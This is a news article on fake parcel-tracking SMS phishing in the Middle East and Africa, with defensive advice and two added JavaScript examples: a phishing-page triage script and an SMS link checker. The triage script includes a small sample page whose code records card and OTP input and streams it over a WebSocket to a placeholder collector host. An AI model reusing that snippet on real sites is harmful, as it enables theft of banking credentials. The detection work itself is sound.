
Fake Shipment Tracking Scams Surge in MEA, Stealing Banking Data Through Real-Time Phishing

Every day, billions of people rely on postal and courier services to deliver everything from personal letters to online orders. This dependence has grown steadily alongside the global rise of e-commerce.

The 2024 Universal Postal Union report found that postal services now serve 7.3 billion people, and Statista recorded roughly 161 billion parcels shipped in 2022 alone. As this reliance deepens, so do the criminal schemes built around it.

Cybercriminals have turned this trust into a weapon through a fast-spreading tactic called the fake shipment tracking scam.

Victims receive an urgent SMS claiming their package could not be delivered, pushing them to click a link and update their address or pay a small handling fee.

The link leads to a polished fake courier website built to look official. Once the victim enters their details, scammers collect personal information, banking credentials, card numbers, and one-time passwords, leaving victims with little time to question what is happening.

Group-IB analysts identified a sharp surge in these scams across the Middle East and Africa (MEA), with activity tracked from early 2024 showing explosive growth through 2025.

Data gathered between December 2025 and February 2026 revealed Egypt as the most targeted country with 119 incidents, followed by South Africa with 20, Ghana with 7, and Kenya with 5.

Most affected industries in MEA (Source – Group-IB)

Postal services were the most abused sector with 115 confirmed cases, while financial services, telecommunications, and mobility platforms also faced repeated targeting.

These campaigns rely heavily on psychological pressure rather than technical complexity. Since delivery notifications have become routine, most people do not stop to question a text about a delayed parcel.

How fake shipment tracking scams work (Source – Group-IB)

Scammers count on this behavior, knowing that someone expecting a delivery is far more likely to click without thinking. The fake pages are built for mobile screens, making them difficult to separate from a real courier’s website.

Behind the scheme is a broader criminal infrastructure spanning multiple countries and using cheap, disposable domain extensions such as .xyz, .sbs, .shop, and .click. Analysis revealed shared IP addresses and overlapping hosting patterns pointing to coordinated activity.

Top TLDs most commonly used in this scheme (Source – Group-IB)

Group-IB researchers also noted characteristics strongly linked to Darcula, a Chinese-language Phishing-as-a-Service platform offering over 20,000 counterfeit domains and more than 200 ready-to-use phishing templates to criminal operators.

Real-Time Credential Theft Through Embedded Scripts

What makes this campaign technically dangerous is how it steals data the moment a victim starts typing. Group-IB’s HTML analysis of the phishing pages uncovered embedded scripts that open a WebSocket connection to an attacker-controlled server the instant a victim loads the page.

This connection works as a live data feed, transmitting every keystroke — including card numbers, CVV codes, and OTPs — directly to the attacker in real time, with victims having no indication their information is leaving their device.

The script also generates a unique UUID token for each victim session, meaning attackers track every individual separately, pointing to a large-scale organized operation.
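For analysts triaging a captured page, the traits described above (a WebSocket opened to another host, listeners on keystroke events, and a per-session UUID) can be checked statically. The following is an added example, not code from Group-IB or the original article; the sample page, its `.invalid` hosts, and all function names are constructed for illustration.

```javascript
// Added example: static triage of a captured page for the traits described above.
// SAMPLE_PAGE is constructed; its hosts and field names are placeholders.
const SAMPLE_PAGE = `<form><input name="card"><input name="otp"></form>
<script>
  var sid = crypto.randomUUID();
  var ws = new WebSocket("wss://collector.example.invalid/feed");
  document.querySelectorAll("input").forEach(function (el) {
    el.addEventListener("input", function () { ws.send(sid + el.name + el.value); });
  });
</script>`;

const SOCKET_RE = /new\s+WebSocket\s*\(\s*["'`](wss?:\/\/[^"'`]+)["'`]/g;
const KEY_HOOK_RE = /addEventListener\s*\(\s*["'](?:input|keyup|keydown|keypress)["']|\.on(?:input|keyup|keydown|keypress)\s*=/;
const SESSION_ID_RE = /randomUUID\s*\(|xxxxxxxx-xxxx-4xxx|uuidv4/i;

// Collect the bodies of inline <script> elements (external scripts need a separate fetch).
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

// pageHost: hostname the page was served from; a socket to any other host counts as foreign.
function triagePage(html, pageHost) {
  const js = inlineScripts(html).join("\n");
  const endpoints = [...js.matchAll(SOCKET_RE)].map((m) => m[1]);
  const findings = {
    socketEndpoints: endpoints,
    foreignSocket: endpoints.some((u) => hostOf(u) !== pageHost),
    keystrokeHook: KEY_HOOK_RE.test(js),   // fires per keystroke, not on form submit
    socketSend: /\.send\s*\(/.test(js),
    perSessionId: SESSION_ID_RE.test(js),  // UUID minted for each visitor
  };
  const hits = ["foreignSocket", "keystrokeHook", "socketSend", "perSessionId"]
    .filter((k) => findings[k]).length;
  findings.verdict = hits === 4 ? "live-capture pattern" : hits >= 2 ? "review" : "no match";
  return findings;
}

console.log(triagePage(SAMPLE_PAGE, "track.example.invalid"));
```

Legitimate chat or support widgets can also combine sockets with input listeners, so a "review" verdict needs a human look; obfuscated or externally loaded scripts are not covered by this static check.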

Fake shipment tracking scams work because such tracking updates have become commonplace (Source – Group-IB)

Phishing pages are also designed to show full content only to mobile browsers, since most SMS links are opened on phones. Attackers further add URL masks such as index.html to make links look more legitimate while ensuring the malicious page loads properly on mobile devices.

Individuals should never click tracking links sent via SMS or messaging apps. Go directly to the official courier website and enter the tracking number manually.

Be cautious of messages demanding immediate payment or address updates, since real courier companies do not charge fees for redelivery. Report suspicious messages to your local cybersecurity authority or postal service.

Businesses should publish regular alerts about phishing campaigns impersonating their brand to keep customers informed.

Applying email authentication protocols such as DMARC, DKIM, and SPF helps prevent spoofed messages from reaching customers.

Partnering with mobile carriers to filter fraudulent SMS patterns and offering a public verification tool for tracking messages can significantly reduce how many customers fall victim to these scams.
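A public verification tool of the kind suggested above could start from a check like the following. This is an added example, not part of the original article or any courier's actual tool; `OFFICIAL_DOMAINS`, the function names, and the sample messages are constructed placeholders, while the TLD list and the index.html mask come from the article.

```javascript
// Added example: sketch of a "verify this tracking SMS" check.
// OFFICIAL_DOMAINS and the sample messages are constructed placeholders.
const OFFICIAL_DOMAINS = ["post.example"];
const CHEAP_TLDS = ["xyz", "sbs", "shop", "click"]; // TLDs named in the article
const PRESSURE_RE = /\b(fee|pay|payment|update (your )?address|could not be delivered)\b/i;
const URL_RE = /\b(?:https?:\/\/)?((?:[a-z0-9-]+\.)+[a-z]{2,})(\/[^\s]*)?/gi;

// Official means the exact domain or a true subdomain of it. A brand name that
// merely appears as a left-hand label of another domain does not count.
function isOfficial(host) {
  return OFFICIAL_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

function verifyTrackingSms(text) {
  const links = [...text.matchAll(URL_RE)].map((m) => {
    const host = m[1].toLowerCase();
    const path = (m[2] || "").split(/[?#]/)[0];
    const reasons = [];
    if (!isOfficial(host)) reasons.push("host is not an official courier domain");
    if (CHEAP_TLDS.includes(host.split(".").pop())) reasons.push("disposable TLD");
    if (/\/index\.html$/i.test(path)) reasons.push("index.html URL mask");
    return { host, reasons };
  });
  const flagged = links.some((l) => l.reasons.length > 0);
  let verdict = "no link found";
  if (links.length > 0) verdict = flagged ? "do not click" : "link matches official domain";
  // pressure: wording that demands a fee or address update, reported separately
  return { links, pressure: PRESSURE_RE.test(text), verdict };
}

const LOOKALIKE_SMS = "Your parcel could not be delivered. Update your address: " +
  "https://post.example.parcel-help.xyz/index.html";
console.log(verifyTrackingSms(LOOKALIKE_SMS));
```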

The post Fake Shipment Tracking Scams Surge in MEA, Stealing Banking Data Through Real-Time Phishing appeared first on Cyber Security News.

Source: cybersecuritynews.com
